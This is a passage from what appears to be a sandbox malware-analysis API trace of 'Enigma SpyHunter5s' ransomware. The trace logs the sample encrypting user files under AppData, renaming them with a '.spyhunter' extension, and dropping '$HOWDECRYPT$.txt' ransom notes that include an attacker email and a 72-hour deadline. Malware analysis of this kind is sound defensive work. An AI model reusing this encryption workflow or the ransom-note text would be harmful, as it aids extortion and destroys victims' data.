:\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0151.089] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec4b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ed74, lpOverlapped=0x0 | out: lpBuffer=0x270ec4b*, lpNumberOfBytesWritten=0x270ed74*=0x127, lpOverlapped=0x0) returned 1 [0151.089] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0151.089] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ed74, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ed74*=0x2ac, lpOverlapped=0x0) returned 1 [0151.090] CloseHandle (hObject=0xa0) returned 1 [0151.090] GetProcessHeap () returned 0x2c0000 [0151.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2ed90 | out: hHeap=0x2c0000) returned 1 [0151.090] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0151.091] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0151.091] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec47*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ed70, lpOverlapped=0x0 | out: lpBuffer=0x270ec47*, lpNumberOfBytesWritten=0x270ed70*=0x127, lpOverlapped=0x0) returned 1 [0151.091] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0151.091] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ed70, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ed70*=0x2ac, lpOverlapped=0x0) returned 1 [0151.092] CloseHandle (hObject=0xa0) returned 1 [0151.092] GetProcessHeap () returned 0x2c0000 [0151.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f46228 | out: hHeap=0x2c0000) returned 1 [0151.092] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed10 | out: pbBuffer=0x270ed10) returned 1 [0151.092] GetProcessHeap () returned 0x2c0000 [0151.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0151.092] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ed08*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ed08*=0x30) returned 1 [0151.092] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0151.093] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi") returned 87 [0151.093] StrStrW (lpFirst="jre1.7.0_45.msi", lpSrch=".txt") returned 0x0 [0151.093] GetProcessHeap () returned 0x2c0000 [0151.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0151.093] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eccc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270eccc*=0x2800, lpOverlapped=0x0) returned 1 [0151.180] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.181] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270eccc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270eccc*=0x2800, lpOverlapped=0x0) returned 1 [0151.181] GetProcessHeap () returned 0x2c0000 [0151.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0151.181] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.181] WriteFile (in: hFile=0xa0, lpBuffer=0x270ed0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eccc, lpOverlapped=0x0 | out: lpBuffer=0x270ed0c*, lpNumberOfBytesWritten=0x270eccc*=0x4, lpOverlapped=0x0) returned 1 [0151.346] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eccc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270eccc*=0x30, lpOverlapped=0x0) returned 1 [0151.346] CloseHandle (hObject=0xa0) returned 1 [0151.346] GetProcessHeap () returned 0x2c0000 [0151.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0151.347] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi.spyhunter") returned 97 [0151.347] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi.spyhunter")) returned 1 [0151.348] GetProcessHeap () returned 0x2c0000 [0151.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0151.348] GetProcessHeap () returned 0x2c0000 [0151.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0151.348] GetProcessHeap () returned 0x2c0000 [0151.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f39cd0 | out: hHeap=0x2c0000) returned 1 [0151.348] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed08 | out: pbBuffer=0x270ed08) returned 1 [0151.348] GetProcessHeap () returned 0x2c0000 [0151.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0151.348] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ed00*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ed00*=0x30) returned 1 [0151.348] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0151.350] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab") returned 69 [0151.350] StrStrW (lpFirst="au.cab", lpSrch=".txt") returned 0x0 [0151.350] GetProcessHeap () returned 0x2c0000 [0151.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0151.350] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ecc4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270ecc4*=0x2800, lpOverlapped=0x0) returned 1 [0151.484] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.484] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ecc4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270ecc4*=0x2800, lpOverlapped=0x0) returned 1 [0151.484] GetProcessHeap () returned 0x2c0000 [0151.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0151.484] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.484] WriteFile (in: hFile=0xa0, lpBuffer=0x270ed04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ecc4, lpOverlapped=0x0 | out: lpBuffer=0x270ed04*, lpNumberOfBytesWritten=0x270ecc4*=0x4, lpOverlapped=0x0) returned 1 [0151.496] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ecc4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ecc4*=0x30, lpOverlapped=0x0) returned 1 [0151.496] CloseHandle (hObject=0xa0) returned 1 [0151.497] GetProcessHeap () returned 0x2c0000 [0151.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0151.497] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab.spyhunter") returned 79 [0151.497] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab.spyhunter")) returned 1 [0151.498] GetProcessHeap () returned 0x2c0000 [0151.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0151.498] GetProcessHeap () returned 0x2c0000 [0151.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0151.498] GetProcessHeap () returned 0x2c0000 [0151.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c80f58 | out: hHeap=0x2c0000) returned 1 [0151.498] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed08 | out: pbBuffer=0x270ed08) returned 1 [0151.498] GetProcessHeap () returned 0x2c0000 [0151.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0151.498] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ed00*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ed00*=0x30) returned 1 [0151.498] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0151.498] GetProcessHeap () returned 0x2c0000 [0151.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0151.499] GetProcessHeap () returned 0x2c0000 [0151.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f67520 | out: hHeap=0x2c0000) returned 1 [0151.499] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed00 | out: pbBuffer=0x270ed00) returned 1 [0151.499] GetProcessHeap () returned 0x2c0000 [0151.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0151.499] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ecf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ecf8*=0x30) returned 1 [0151.499] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0151.499] GetProcessHeap () returned 0x2c0000 [0151.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0151.499] GetProcessHeap () returned 0x2c0000 [0151.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f67408 | out: hHeap=0x2c0000) returned 1 [0151.499] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\uv0duwvb\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0151.500] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0151.500] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec33*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ed5c, lpOverlapped=0x0 | out: lpBuffer=0x270ec33*, lpNumberOfBytesWritten=0x270ed5c*=0x127, lpOverlapped=0x0) returned 1 [0151.501] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0151.501] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ed5c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ed5c*=0x2ac, lpOverlapped=0x0) returned 1 [0151.501] CloseHandle (hObject=0xa0) returned 1 [0151.501] GetProcessHeap () returned 0x2c0000 [0151.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe8770 | out: hHeap=0x2c0000) returned 1 [0151.501] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ecf8 | out: pbBuffer=0x270ecf8) returned 1 [0151.501] GetProcessHeap () returned 0x2c0000 [0151.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0151.501] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ecf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ecf0*=0x30) returned 1 [0151.501] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0151.502] GetProcessHeap () returned 0x2c0000 [0151.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0151.502] GetProcessHeap () returned 0x2c0000 [0151.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2c590 | out: hHeap=0x2c0000) returned 1 [0151.502] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ecf8 | out: pbBuffer=0x270ecf8) returned 1 [0151.502] GetProcessHeap () returned 0x2c0000 [0151.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0151.502] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ecf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ecf0*=0x30) returned 1 [0151.502] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\uv0duwvb\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0151.502] GetProcessHeap () returned 0x2c0000 [0151.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0151.502] GetProcessHeap () returned 0x2c0000 [0151.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2c478 | out: hHeap=0x2c0000) returned 1 [0151.502] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ecf0 | out: pbBuffer=0x270ecf0) returned 1 [0151.502] GetProcessHeap () returned 0x2c0000 [0151.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0151.503] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ece8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ece8*=0x30) returned 1 [0151.503] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0151.503] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat") returned 97 [0151.503] StrStrW (lpFirst="index.dat", lpSrch=".txt") returned 0x0 [0151.503] GetProcessHeap () returned 0x2c0000 [0151.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0151.503] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ecac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270ecac*=0x2800, lpOverlapped=0x0) returned 1 [0151.506] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.506] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ecac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270ecac*=0x2800, lpOverlapped=0x0) returned 1 [0151.506] GetProcessHeap () returned 0x2c0000 [0151.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0151.506] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.506] WriteFile (in: hFile=0xa0, lpBuffer=0x270ecec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ecac, lpOverlapped=0x0 | out: lpBuffer=0x270ecec*, lpNumberOfBytesWritten=0x270ecac*=0x4, lpOverlapped=0x0) returned 1 [0151.507] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ecac, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ecac*=0x30, lpOverlapped=0x0) returned 1 [0151.507] CloseHandle (hObject=0xa0) returned 1 [0151.507] GetProcessHeap () returned 0x2c0000 [0151.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0151.507] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.spyhunter") returned 107 [0151.507] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat.spyhunter")) returned 1 [0151.507] GetProcessHeap () returned 0x2c0000 [0151.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0151.508] GetProcessHeap () returned 0x2c0000 [0151.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0151.508] GetProcessHeap () returned 0x2c0000 [0151.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2c360 | out: hHeap=0x2c0000) returned 1 [0151.508] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0151.508] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur 